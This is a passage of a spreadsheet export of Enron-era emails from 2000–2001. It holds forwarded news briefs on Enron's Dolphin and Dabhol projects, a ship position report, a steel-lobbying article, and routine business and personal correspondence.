forecast of 795 million euros. Profit rose 63% to 468 million euros; earnings _x000D_
and pretax profit were both helped by one-time gains of 454 million euros. _x000D_
Operating profit fell 59% in the retail-banking division to 98 million euros, _x000D_
and was down 43% in the international-markets division to 184 million euros. _x000D_
HypoVereinsbank said tough market conditions world-wide reduced regular _x000D_
commission and interest income. _x000D_
Enron Pulls Out of Emirates Gas Project _x000D_
U.S. energy company Enron has decided to pull out of the multibillion-dollar _x000D_
Dolphin natural-gas project, selling its 24.5% stake to the United Arab _x000D_
Emirates Offsets Group, or UOG, according to Dolphin Energy's managing _x000D_
director, Ahmed Al-Sayigh. He didn't specify the reason for Enron's _x000D_
withdrawal or the value of Enron's stake. The Dolphin project agreement, _x000D_
reached two years ago by UOG and Qatar Petroleum, aims to bring two billion _x000D_
cubic feet a day of natural gas from Qatar's offshore North Field in the _x000D_
Persian Gulf to Abu Dhabi and onward to Dubai. Enron and France's _x000D_
TotalFinaElf each held a 24.5% stake, with UOG owning the remaining 51%. Mr. _x000D_
Sayigh said UOG will hold discussions with other companies on a possible sale _x000D_
of Enron's original stake. Richard Bergester, manager for Enron Middle East, _x000D_
said that having contributed to the project's initial stages, Enron now feels _x000D_
it can't "add" any more. He didn't elaborate. A TotalFinaElf official said it _x000D_
is interested in a greater stake in Dolphin. _x000D_
Marc Rich Gains Control of Swiss Firm _x000D_
Marc Rich, the former U.S. fugitive given a controversial pardon by President _x000D_
Clinton, effectively pulled off a management coup at Swiss real-estate _x000D_
company Feldschloesschen-Huerlimann Holding by thwarting its merger plans _x000D_
with Swiss Prime Site and forcing the board to quit. Feldschloesschen's _x000D_
ousted chairman, Robert Jeker, said Marc Rich Group now had control of the _x000D_
company. Mr. Rich himself is not on the board, but he controls more than 10% _x000D_
of the votes in Feldschloesschen. _x000D_
_x000D_
ASIA/PACIFIC _x000D_
BRIEFLY: _x000D_
-- Bass Hotels &amp; Resorts, a unit of Britain's Bass, said it will buy the _x000D_
Regent Hotel Hong Kong for $346 million from Hong Kong's New World _x000D_
Development. _x000D_
-- Indian lenders said they want the Indian government to intervene after _x000D_
U.S. energy company Enron's threat to walk out of its Dabhol Power unit's _x000D_
huge project in Maharashtra state put their loans in jeopardy. Domestic _x000D_
lenders have lent $1.4 billion out of the project's total $2.9 billion cost. _x000D_
-- Australian Prime Minister John Howard caved in to intense pressure over _x000D_
the collapse of HIH Insurance, announcing a royal commission into the _x000D_
company's failure and setting aside over 500 million Australian dollars ($265 _x000D_
million) to assist victims of the Australian insurer's collapse. _x000D_
-- Japan's trade surplus shrank at a faster-than-expected pace in April, _x000D_
narrowing 42% from a year earlier to 665.9 billion yen ($5.39 billion), as _x000D_
reduced foreign demand weighed on the country's economy. _x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
_x000D_
Business; Financial Desk_x000D_
IN BRIEF / ENERGY Enron Withdraws from Qatar Project_x000D_
Bloomberg News_x000D_
_x000D_
05/22/2001_x000D_
Los Angeles Times_x000D_
Home Edition_x000D_
C-2_x000D_
Copyright 2001 / The Times Mirror Company_x000D_
_x000D_
Enron Corp. pulled out of a $2-billion pipeline project to export gas from _x000D_
Qatar as it became increasingly likely that an Indian power-sales agreement _x000D_
will collapse. The company said the move is not related to a filing by its _x000D_
65%-owned Dabhol Power Co. to India's Maharashtra state's electricity board _x000D_
to stop supplying power because it's owed about $63.9 million by the board._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
INDIA: UPDATE 1-Indian state spurred by Enron reopens power deals._x000D_
By Narayanan Madhavan_x000D_
_x000D_
05/22/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
BANGALORE, India, May 22 (Reuters) - India's technology state of Karnataka, _x000D_
spurred by a payments row involving U.S. power developer Enron Corp in a _x000D_
neighbouring province, has reopened sealed power purchase deals with 11 _x000D_
private firms. _x000D_
The southern state's government has told independent power producers (IPPs), _x000D_
which are yet to start generation, that they need to make their tariffs more _x000D_
competitive, officials said._x000D_
"Now it (electricity) cannot be at any cost," V.P. Baligar, chairman and _x000D_
managing director of the Karnataka State Power Transmission Corp Ltd (KPTCL), _x000D_
the state's monopoly power distributor, told Reuters in an interview late on _x000D_
Monday. _x000D_
The move comes on the heels of the bitter wrangle in Maharashtra state _x000D_
involving Dabhol Power Co, 65-percent owned by Houston-based Enron. _x000D_
Dabhol issued a preliminary notice on Saturday to end a contract to sell _x000D_
power to the Maharashtra State Electricity Board. The step came after _x000D_
Maharashtra ceased payments saying Dabhol's tariffs were too high. _x000D_
The $2.9-billion project, which is 90-percent complete, was first billed as a _x000D_
showcase of India's decade-old reform programme but now is regarded by _x000D_
critics as a symbol of policy bungling. "Enron is a lesson for all of us," _x000D_
Baligar said. _x000D_
Karnataka also said it would not provide financial assurances in the form of _x000D_
escrow cover and government loan guarantees which the firms wanted to help _x000D_
sweeten lending rates. _x000D_
"We're trying to tell them your tariff has to be competitive," Baligar said, _x000D_
but added that the state was open to negotiations. "You have to have the _x000D_
final capability so you can implement the project without any guarantee or _x000D_
escrow." _x000D_
SIGNED DEALS _x000D_
Five years ago, the state signed power purchase deals with 14 private firms. _x000D_
Three of them are already generating power at rates higher than the state _x000D_
would now like to pay. They will continue to get these rates but the 11 _x000D_
unbuilt units face an uncertain future. _x000D_
The 11 plants involve 2,000 megawatts (MW) of capacity, half of which would _x000D_
be supplied by the Mangalore Power Co (MPC) from which U.S.-based Cogentrix _x000D_
exited in 1999, citing litigation and delays in government approval. _x000D_
China Light &amp; Power now owns the company, in which India's Tata group is _x000D_
expected to take 30 percent. MPC Managing Director V.P. Sharma told Reuters _x000D_
that his firm's project would not be hit by the demand for lower tariffs _x000D_
because it was based on coal unlike the Enron project, based on naphtha. _x000D_
"Our cost is the lowest cost approved (and) coal prices have fallen (since _x000D_
the agreement)," Sharma told Reuters from Bombay. Company officials say the _x000D_
project is also looking forward to a federal guarantee to help it move _x000D_
forward. _x000D_
Baligar said the government's intention was to weed out those who are not _x000D_
serious. "Those who are serious can sit with us and sort out their problems," _x000D_
he said. _x000D_
Power tariffs vary, depending upon foreign exchange rates and the type and _x000D_
prices of fuels. Three projects which are already generating power get about _x000D_
3.0 to 4.0 rupees (6.4 to 8.5 U.S. cents) per unit. The 11 uninstalled plants _x000D_
had comparable rates but MPC says falling coal prices helped its _x000D_
competitiveness. _x000D_
One generating firm, Jindal Tractabel, which uses coal and gas, gets about _x000D_
2.60 rupees. Its purchase agreement was not among the 14 and is awaiting _x000D_
regulatory approval. The state wants the Jindal rate to be the benchmark for _x000D_
reopened agreements. _x000D_
If private firms cut capital costs and work out long-term fuel supplies, they _x000D_
will be able to cut rates, Baligar said. _x000D_
The state says it needs 4,000 MW of new capacity over 10 years and 2,500 MW _x000D_
over five years. State-run utilities are in a position to meet five-year _x000D_
needs at low rates, Baligar said. _x000D_
Asked if Karnataka could face litigation over the reopening of the contracts, _x000D_
Baligar had legally strong arguments. ( $1 = 46.9 rupees)._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
_x000D_
INDIA: India utility may slap 4bln rupee fine on Enron unit._x000D_
_x000D_
05/22/2001_x000D_
Reuters English News Service_x000D_
(C) Reuters Limited 2001._x000D_
_x000D_
BOMBAY, May 22 (Reuters) - An Indian utility is planning to impose a second _x000D_
penalty of four billion rupees ($85 million) on Enron's local unit, barely a _x000D_
week after the U.S. energy giant took its first step to pull out of the _x000D_
embattled project. _x000D_
A senior official at the Maharashtra State Electricity Board (MSEB) said on _x000D_
Tuesday the fine on Dabhol Power Company (DPC) was for not meeting capacity _x000D_
targets within a stipulated period._x000D_
"We will do this as soon as the bill for May is received next month," the _x000D_
official told Reuters. _x000D_
DPC officials declined to comment on the matter. _x000D_
Earlier this year, MSEB had imposed a similar penalty on DPC - which DPC has _x000D_
not paid - saying its plant could not be ramped up to full capacity within _x000D_
three hours from a cold start. _x000D_
Enron and MSEB have been battling for six months over payment defaults and _x000D_
last week DPC, owned 65 percent by Enron, issued a preliminary notice to _x000D_
terminate a power purchase agreement - widely seen as a move that would lead _x000D_
to a pull out. _x000D_
According to DPC, it is owed $48 million by MSEB. _x000D_
A top government official told Reuters in Delhi on Monday the federal _x000D_
government is optimistic Houston-based Enron and the Maharashtra state will _x000D_
resolve their wrangle. _x000D_
The agreement signed between MSEB and DPC in 1995 stipulates that if Dabhol's _x000D_
plant cannot achieve 100 percent capacity within three hours from restart, _x000D_
MSEB is entitled to impose a penalty. _x000D_
The MSEB official said the plant had failed to fulfil this condition in _x000D_
February and March, considered peak periods for power demand by the utility. _x000D_
DPC is building a $2.9 billion, 2,184 MW plant, of which the first phase of _x000D_
740 MW began operations in May 1999. _x000D_
Enron is India's largest foreign investor. ($1=47.0 Indian rupees)._x000D_
_x000D_
Copyright , 2000 Dow Jones &amp; Company, Inc. All Rights Reserved. _x000D_
_x000D_
_x000D_
IXEurope creates a Storm in colocation_x000D_
_x000D_
05/22/2001_x000D_
M2 Presswire_x000D_
Copyright 2001 M2 Communications, Ltd. All Rights Reserved._x000D_
_x000D_
IXEurope, a leading pan-European provider of Internet infrastructure and _x000D_
hosting services, today announces that it has signed a deal with Storm _x000D_
Telecommunications Limited (Storm), the international optical switched _x000D_
service provider, with an intelligent optical backbone network built in the _x000D_
UK, France, Germany, the Netherlands, Denmark, Sweden and Norway. Over the _x000D_
coming months Storm's network will also be operational in the USA, _x000D_
Switzerland, Italy and Austria. _x000D_
Under the agreement Storm will locate its optical switching equipment at _x000D_
IXEurope's flagship datacentres in London and Frankfurt, with plans to use _x000D_
other IXDatacentres across Europe for colocation of its equipment to support _x000D_
its European and North American metro access rollout._x000D_
Storm is the tenth carrier to enter the London city IXDatacentre meaning that _x000D_
IXEurope's customers (including other carriers) will benefit from the _x000D_
services that Storm offers. This illustrates the advantages that IXEurope's _x000D_
carrier-neutral status brings -connectivity, cost-effective choice and _x000D_
flexibility. _x000D_
Guy Willner, CEO of IXEurope, commenting on the deal, said: "We are pleased _x000D_
to support Storm's IP network rollout. It will naturally interlink with the _x000D_
new gigabit ethernet service we are offering across our pan-European network _x000D_
of IXDataCentres." Mark Stewart, senior vice president, business development _x000D_
of Storm, said "We chose IXEurope as one of our colocation partners because _x000D_
of its extensive pan-European presence and the strategic location of its _x000D_
datacentres. IXEurope has ensured that its datacentres are located where _x000D_
there is an abundance of network, and provides a choice of carriers, which _x000D_
allows us great flexibility. IXEurope will also provide us with the ability _x000D_
to expand over an agreed time scale." _x000D_
IXEurope, which now has eight operational datacentres across Europe, has _x000D_
recently signed contracts to provide colocation and managed services to _x000D_
Hewlett Packard, Enron Broadband Services (EBS) and The Data Company. _x000D_
IXEurope has just been awarded the ISO9002 quality assured certification for _x000D_
the second consecutive year , showing its commitment to quality across its _x000D_
European operations. _x000D_
IXEurope _x000D_
IXEurope provides neutral colocation and facilities management services to _x000D_
corporate, internet and telecoms organisations, allowing them speedier access _x000D_
to market and the freedom to focus on their core business. _x000D_
IXDatacentres are present across Europe in all major business centres, _x000D_
including London, Paris, Frankfurt, Zurich, Nice, Dusseldorf, Milan and _x000D_
Barcelona. IXEurope is an ISO9002 Quality Certified Company and a founding _x000D_
member of the Colocation and Hosting Association. IXEurope's funders include _x000D_
Bank of America, JPMorgan and European Acquisition Capital. For more _x000D_
information please visit the website at www.ixeurope.com _x000D_
About Storm Telec</t>
  </si>
  <si>
    <t>Fri, 18 May 2001 01:43:13 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'wayne.perry@enron.com', 'lhs-gas.kvammen@enron.com', 'tony.galt@enron.com', 'dan.masters@enron.com', 'jim.fernie@enron.com', "paul.y'barbo@enron.com"})</t>
  </si>
  <si>
    <t>POSREP 18 MAY</t>
  </si>
  <si>
    <t>POSREP HOEGH GALLEON, DATE:	18-May	12:00	9:00	(UTC)_x000D_
A) Position at noon:	N	16 10	E	41 18_x000D_
B) Dist. From last noon:	473	nm_x000D_
C) Dist. To go to next port:	951	nm_x000D_
D) ETA next port:	SUEZ	20 20:00	LT_x000D_
E) 1: Average sea/wind	Sea:	WNW 4	Wind:	WNW 3_x000D_
    2: Average speed	18.92	kn	RPM:	94.58_x000D_
    3: BOG consumed	171.5	m3_x000D_
    4: BOG Total	171.5	m3_x000D_
    5: F.O Consumed	68	m3_x000D_
    6: G.O. Consumed	0	m3_x000D_
    7: Average vapor press		Average liq. Temp:_x000D_
Tk1:	0.101	bar	-159.04	?C_x000D_
Tk2:	0.099	bar	-159.09	?C_x000D_
Tk3:	0.099	bar	-159.32	?C_x000D_
Tk4:	0.099	bar	-159.06	?C_x000D_
Tk5:	0.101	bar	-159.03	?C_x000D_
_x000D_
Brgds Knut Bentzr?d_x000D_
Master LNG/C "Hoegh Galleon"_x000D_
_x000D_
E-mail: master.gall@hoegh.no_x000D_
Teleph: Inmarsat tel.no.+873 330853910_x000D_
Fax   : Inmarsat fax no.+873 330853913_x000D_
Telex : Inmarsat B telex no.+583 330853915_x000D_
Telex : Inmarsat C telex no.+583 430853910 (24hrs.watch)</t>
  </si>
  <si>
    <t>Thu, 1 Feb 2001 02:08:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'dorothy.youngblood@enron.com', 'ryang@enron.com', 'rshapiro@enron.com', 'gsavage@enron.com', 'tim.belden@enron.com', 'rick.johnson@enron.com', 'donna.fulton@enron.com', 'hgovenar@govadv.com', 'sgahn@enron.com', 'jalamo@enron.com', 'ehughes2@enron.com', 'mary.hain@enron.com', 'msmith1@enron.com', 'don.black@enron.com', 'ccalger@enron.com', 'dennis.benevides@enron.com', 'paul.kaufman@enron.com', 'james.d.steffes@enron.com', 'william.s.bradford@enron.com', 'steven.j.kean@enron.com', 'smara@enron.com', 'kgustafs@enron.com', 'carol.moffett@enron.com', 'vsharp@enron.com', 'harry.kingerski@enron.com', 'beverly.aden@enron.com', 'debora.whitehead@enron.com', 'mmilner@enron.com', 'wcurry@enron.com', 'gweiss@enron.com', 'acomnes@enron.com', 'kdenne@enron.com', 'jdasovic@enron.com', 'bhansen@lhom.com', 'emelvin@enron.com', 'david.parquet@enron.com', 'sandra.mccubbin@enron.com', 'dblack@enron.com', 'mday@gmssr.com', 'joe.hartsoe@enron.com', 'bill.votaw@enron.com'})</t>
  </si>
  <si>
    <t>ABX 1 - Passage</t>
  </si>
  <si>
    <t>ABX 1 passed off of the Assembly floor on a vote of 54-25 and is on its_x000D_
way to Governor Davis who is expected to sign the measure immediately._x000D_
Only four Republicans voted for the bill.</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 01:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EWEB ISDA Master Agreement/Confirmation</t>
  </si>
  <si>
    <t>Jim:_x000D_
_x000D_
I was hoping that we could speak sometime today as I will be out of the _x000D_
office Dec. 7 and 8.  I would like to discuss your comments the Schedule and _x000D_
receive your blackline to the Credit Support Annex.  I am available all day _x000D_
except between the hours of 10 am - 2 pm (Houston time).  I look forward to _x000D_
hearing from you.  Regards.  Sara</t>
  </si>
  <si>
    <t>Thu, 4 Jan 2001 04:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Here is a timely report for distribution to the GA group</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
_x000D_
	Margaret Carson_x000D_
	01/04/2001 11:30 AM_x000D_
		 _x000D_
		 To: James D Steffes/NA/Enron@Enron, Ginger Dernehl/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Here is a timely report for distribution to the GA group_x000D_
_x000D_
Fyi    It is   easier  to  read after detaching  and click on  the PDF _x000D_
version.  M Carson</t>
  </si>
  <si>
    <t>Mon, 6 Aug 2001 10:48:53 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'paul_jonathan_thomas@yahoo.com'})</t>
  </si>
  <si>
    <t>RE: Nathan Thomas</t>
  </si>
  <si>
    <t>Paul,_x000D_
_x000D_
So nice to hear from you.  I hope things are going great for you as well.  I'm actually going Laura Jahnke's wedding that same evening.  Otherwise, I would have loved to have gone.  Please tell Nathan I say, "hello" and wish he and his new wife the very best.  So when does school start?  And, how are the small businesses going?_x000D_
_x000D_
Have a nice time at the wedding,_x000D_
Susan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Paul Thomas &lt;paul_jonathan_thomas@yahoo.com&gt;@ENRON [mailto:IMCEANOTES-Paul+20Thomas+20+3Cpaul+5Fjonathan+5Fthomas+40yahoo+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Monday, July 30, 2001 8:45 PM_x000D_
To:	Scott, Susan M._x000D_
Subject:	Nathan Thomas_x000D_
_x000D_
Hey Susan,_x000D_
_x000D_
I hope things are going great!_x000D_
_x000D_
Do you remember Nathan Thomas?  He is getting married_x000D_
on August 11th(I will be one of the groomsmen)._x000D_
_x000D_
I thought you might be interested._x000D_
_x000D_
_x000D_
Have fun,_x000D_
Paul_x000D_
_x000D_
PS - How are things going?_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Make international calls for as low as $.04/minute with Yahoo! Messenger_x000D_
http://phonecard.yahoo.com/</t>
  </si>
  <si>
    <t>Wed, 4 Apr 2001 04:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'juliann.kemp@enron.com'})</t>
  </si>
  <si>
    <t>Air Products - plant down for 4 days.</t>
  </si>
  <si>
    <t xml:space="preserve">Did you want me to confirm down on this meter  starting today.  (POPs). _x000D_
Deal is at 3,000 and pathed at 0._x000D_
meter 1418 - thanks - Julie_x000D_
_x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 May 2000 05:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sarah.novosel@enron.com', 'joe.hartsoe@enron.com', 'steven.kean@enron.com', 'richard.shapiro@enron.com'})</t>
  </si>
  <si>
    <t>NERC 2000 Summer Assessment</t>
  </si>
  <si>
    <t xml:space="preserve">This talks about the need for the proposed merchant generation to be built, _x000D_
so Dan W. is including this in the Entergy rehearing._x000D_
---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 05/24/2000 _x000D_
12:39 PM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Bill Rust                           05/23/2000 01:25 PM_x000D_
	_x000D_
_x000D_
To: Christi L Nicolay/HOU/ECT@ECT, Charles Yeung/HOU/ECT@ECT, Lloyd _x000D_
Will/HOU/ECT@ECT, Jeff King/Corp/Enron@Enron, Kevin M Presto/HOU/ECT@ECT, _x000D_
Rogers Herndon/HOU/ECT@ect, Patrick Hanse/HOU/ECT@ECT, Tom Dutta/HOU/ECT@ECT, _x000D_
Greg Woulfe/HOU/ECT@ECT, Mark Dana Davis/HOU/ECT@ECT, John _x000D_
Zufferli/HOU/ECT@ECT, Doug Gilbert-Smith/Corp/Enron@ENRON, Mitch _x000D_
Robinson/Corp/Enron@Enron, Mike Curry/HOU/ECT@ECT, Edward D _x000D_
Baughman/HOU/ECT@ECT, Terri Clynes/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: NERC 2000 Summer Assessment_x000D_
_x000D_
FYI, here is the NERC 2000 Summer Assessment._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Jun 2001 10:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'register@washingtonpost.com'})</t>
  </si>
  <si>
    <t>A washingtonpost.com article from lisa.yoho@enron.com</t>
  </si>
  <si>
    <t xml:space="preserve">You have been sent this message from lisa.yoho@enron.com as a courtesy of the _x000D_
Washington Post (http://www.washingtonpost.com). FYI. To view the entire _x000D_
article, go to _x000D_
http://www.washingtonpost.com/wp-dyn/articles/A32756-2001Jun6.html Steel _x000D_
Lobbyists Gain the Edge_x000D_
In persuading President Bush, a self-proclaimed free trader, to take steps _x000D_
this week aimed at restricting imports of steel, lobbyists for the U.S. steel _x000D_
industry used the threat that thousands of retired steelworkers in key states _x000D_
would lose their health insurance if their companies closed._x000D_
_x000D_
The specter of an uprising by steel retirees, who substantially outnumber _x000D_
active steelworkers, provided a potent political argument for the industry's _x000D_
case that Bush should take drastic action to protect U.S. steel companies _x000D_
from a worldwide glut even at the cost of tarnishing his free-trade image._x000D_
_x000D_
The argument was advanced by two top Republican lobbyists, Edward W. _x000D_
Gillespie and Vin Weber, each of whom has been receiving $45,0!_x000D_
00!_x000D_
a month from an industry-union coalition called Stand Up for Steel._x000D_
_x000D_
The coalition scored a smashing victory Tuesday, when Bush announced that his _x000D_
administration will file a case with the U.S. International Trade Commission _x000D_
seeking to win authority to set quotas on steel imports. And although many _x000D_
factors went into the White House's decision, industry sources and other _x000D_
participants pointed to the concerns raised by Gillespie and Weber as a _x000D_
classic demonstration of how a highly motivated constituency can sway an _x000D_
administration that barely won the electoral college and lost the popular _x000D_
vote._x000D_
_x000D_
"From a political perspective, this was not a hard case to make to a _x000D_
government as closely divided as this one is," said Weber, a former _x000D_
congressman, in an interview. Eighteen steel companies are "in one stage or _x000D_
another of bankruptcy. All those retirees are facing loss of benefits."_x000D_
_x000D_
Only about 150,000 people now work in U.S. steel facilities, but at some of _x000D_
the biggest integrated steel!_x000D_
ma!_x000D_
kers -- which are in the worst trouble financially -- there are about six _x000D_
retirees for every active worker. (The total number of retirees is slightly _x000D_
more than 300,000, according to industry officials)._x000D_
_x000D_
Adding to the political punch behind the Gillespie-Weber argument was the _x000D_
fact that many of these retirees live in Rust Belt states that were hotly _x000D_
contested in the last presidential election, including Pennsylvania, _x000D_
Illinois, Ohio and West Virginia. The most fiercely contested state of all -- _x000D_
Florida -- is among the top eight states  in number of retirees._x000D_
_x000D_
A lobbyist who worked against the steel industry, Lewis Leibowitz of the law _x000D_
firm Hogan &amp; Hartson, ruefully gave credit to his opponents' political skill. _x000D_
Leibowitz represents the Consumer Industry Trade Action Coalition, which _x000D_
consists of companies that favor free trade on the grounds that import _x000D_
competition helps keep costs low._x000D_
_x000D_
"They did a lot, obviously," Leibowitz said, referring to Gillespie and _x000D_
Weber. "This is an!_x000D_
i!_x000D_
ndustry that has something like 160,000 workers, and the market [value] of _x000D_
all the companies is smaller than that of Amazon.com, and they've turned this _x000D_
town upside down. So my hat is off to them."_x000D_
_x000D_
The administration took other considerations into account, to be sure, _x000D_
including the need to win support from steel state Democrats for _x000D_
congressional authority to negotiate new trade agreements._x000D_
_x000D_
Jim Dyke, a spokesman for Commerce Secretary Donald L. Evans, asserted that _x000D_
his boss was particularly moved by the pleas of union leaders who recalled _x000D_
how their companies had shed workers and restructured in the 1980s only to _x000D_
find themselves devastated anew by imports. Foreign steel shipments, which _x000D_
account for about 20 percent of the U.S. market, reached record levels after _x000D_
financial crises in Asia, Russia and Brazil in the late 1990s._x000D_
_x000D_
"Factories are closing, and people are losing their jobs, because there's not _x000D_
a level playing field," Dyke said, repeating the administration's argument!_x000D_
t!_x000D_
hat a major reason for the oversupply of steel on world markets is the _x000D_
subsidies that many foreign countries provided when they established their _x000D_
national industries. "This fits in with the president's free-trade strategy."_x000D_
_x000D_
Capitalizing on the administration's decision, Evans joined in a news _x000D_
conference/rally yesterday with such top labor leaders as John Sweeney, _x000D_
president of the AFL-CIO, and Leo Gerard, president of the United _x000D_
Steelworkers of America, both of whom backed Democrat Al Gore in the 2000 _x000D_
presidential race._x000D_
_x000D_
"You can trust that we will be with you every step of the way until the _x000D_
problem is fixed," Evans told the cheering crowd, which was reminded by other _x000D_
speakers that the Clinton administration had balked at filing a case like the _x000D_
one Bush intends to bring before the International Trade Commission. (The _x000D_
Clinton administration, along with a number of industry lawyers, feared _x000D_
losing the case at the time, but industry experts said another factor was the _x000D_
staunch fr!_x000D_
ee!_x000D_
-trade stance of the Treasury Department.)_x000D_
_x000D_
The Bush administration itself has balked at taking action that would _x000D_
directly protect the benefits of steel retirees. The steelworkers union has _x000D_
called for the government to create a fund that would help cover these  _x000D_
"legacy costs," but administration officials said their moves to block _x000D_
imports should help protect benefits by aiding the industry's revival._x000D_
_x000D_
The White House will now have to contend with the ire of U.S. trading _x000D_
partners, which have reacted with a mixture of indignation and restraint. _x000D_
Long Tong Yu, China's top trade official, told a news conference at a trade _x000D_
meeting in Zhouzhuang yesterday that although "China is concerned with any _x000D_
protectionist practices or measures,"  it would wait to see whether the U.S. _x000D_
action conformed with the rules of the World Trade Organization._x000D_
_x000D_
Akira Chihaya, president of Nippon Steel Corp. and the head of Japan's Iron _x000D_
and Steel Federation, lashed out at the United States, saying he fears!_x000D_
t!_x000D_
he administration's move "will encourage protectionism, which has been _x000D_
spreading globally."_x000D_
_x000D_
But U.S. steel industry sources were crowing over the importance of a _x000D_
professed free-trade president putting his imprimatur on an ambitious _x000D_
initiative to save the industry. "He must be choking, but he wants to win _x000D_
elections," one industry official said._x000D_
_x000D_
&lt;em&gt;Correspondent Clay Chandler in Shanghai contributed to this report.&lt;/em&gt;_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 3 Aug 2001 13:06:18 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: SoCal RLS Tariff revision (will help So Trails)</t>
  </si>
  <si>
    <t>FYI, I'm having our new analyst, David Junus, look at the CPUC order and start breaking down the SoCal rate calculation.  _x000D_
_x000D_
-----Original Message-----_x000D_
From: Watson, Kimberly _x000D_
Sent: Friday, August 03, 2001 3:02 PM_x000D_
To: Hyatt, Kevin_x000D_
Subject: RE: SoCal RLS Tariff revision (will help So Trails)_x000D_
_x000D_
_x000D_
Hey Kevin,_x000D_
_x000D_
Thanks for the message.  In fact, I talked with Glenn Hass about this earlier today.  I also talked to Questar about this today as well.  Gary Schmitt was somewhat optimistic, but he had not seen the full order yet so he was still reserved.  I'll keep you posted.  _x000D_
_x000D_
Thanks,_x000D_
Kim._x000D_
_x000D_
-----Original Message-----_x000D_
From: Hyatt, Kevin _x000D_
Sent: Friday, August 03, 2001 1:23 PM_x000D_
To: Watson, Kimberly; Gadd, Eric; Donoho, Lindy_x000D_
Subject: SoCal RLS Tariff revision (will help So Trails)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Gwen Soong [mailto:igsinc@ix.netcom.com]_x000D_
Sent: Friday, August 03, 2001 1:18 PM_x000D_
To: Kevin Hyatt_x000D_
Cc: Steve Harris_x000D_
Subject: _x000D_
_x000D_
_x000D_
Kevin,_x000D_
_x000D_
As a follow up to our recent discussions concerning the SoCalGas RLS or_x000D_
peaking rate, I am forwarding to you the proposed decision of ALJ Brown.  My_x000D_
understanding is that at yesterday's Commission meeting the Commission made_x000D_
a decision to approve a change to the current peaking rate tariff.  I should_x000D_
have their decision within a couple working days.  I am forwarding their_x000D_
draft decision._x000D_
_x000D_
The expected PD rate design for the new peaking rate would include SFV rate_x000D_
design principals, demand charges determined over highest recorded usage_x000D_
over a 12 month period, and inclusion of public purpose program charges.  At_x000D_
this point we'll call it a modified cost of service approach._x000D_
_x000D_
If you have any questions, please call._x000D_
_x000D_
_x000D_
Mark Baldwin</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 06:51:10 -0800 (PST)</t>
  </si>
  <si>
    <t>1)	Call Peter Meier w/ PG&amp;E, 240-372-2933._x000D_
_x000D_
2)	Please call Dan w/ PG&amp;E, 310-280-6078.  He needs the number to the Corral contact.</t>
  </si>
  <si>
    <t>Fri, 28 Jul 2000 02:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({"d'arcy.carroll@enron.com", 'steve.nagy@enron.com'})</t>
  </si>
  <si>
    <t>EnronOnline Management Report for July 25, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">D'Arcy,_x000D_
Attached as requested is the copy of the public information on EOL._x000D_
_x000D_
mike_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 07/28/2000=20_x000D_
08:59 AM ---------------------------_x000D_
  =20_x000D_
_x000D_
_x000D_
From:  Rahil Jafry                                                         =_x000D_
  =20_x000D_
 07/27/2000 07:10 PM=09_x000D_
=09_x000D_
=09_x000D_
=09                          =20_x000D_
=09_x000D_
_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc: Julie.Ferrara@enron.com=20_x000D_
Subject: EnronOnline Management Report for July 25, 2000_x000D_
_x000D_
Mike,_x000D_
_x000D_
Here're the Management Reports for the last two days - per Julie's request._x000D_
_x000D_
Regards,_x000D_
Rahil_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Rahil Jafry/HOU/ECT on 07/27/2000 07:08=_x000D_
=20_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Leonardo Pacheco@ENRON_x000D_
07/26/2000 06:56 PM_x000D_
To: Kenneth Lay/Corp/Enron@Enron, Jeff Skilling/Corp/Enron@ENRON, Joseph W=_x000D_
=20_x000D_
Sutton/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cliff Baxter/HOU/ECT@ECT, Mike=_x000D_
=20_x000D_
McConnell/HOU/ECT@ECT, Jay Fitzgerald/Corp/Enron@ENRON, Mark=20_x000D_
Palmer/Corp/Enron@ENRON, John Sherriff/LON/ECT@ECT, Greg Whalley/HOU/ECT@EC=_x000D_
T,=20_x000D_
Jeffrey A Shankman/HOU/ECT@ECT, Kimberly Hillis/HOU/ECT@ect, Daniel=20_x000D_
Reck/HOU/ECT@ECT, Tim Belden/HOU/ECT@ECT, Thor Lien/OSL/ECT@ECT, Douglas S=_x000D_
=20_x000D_
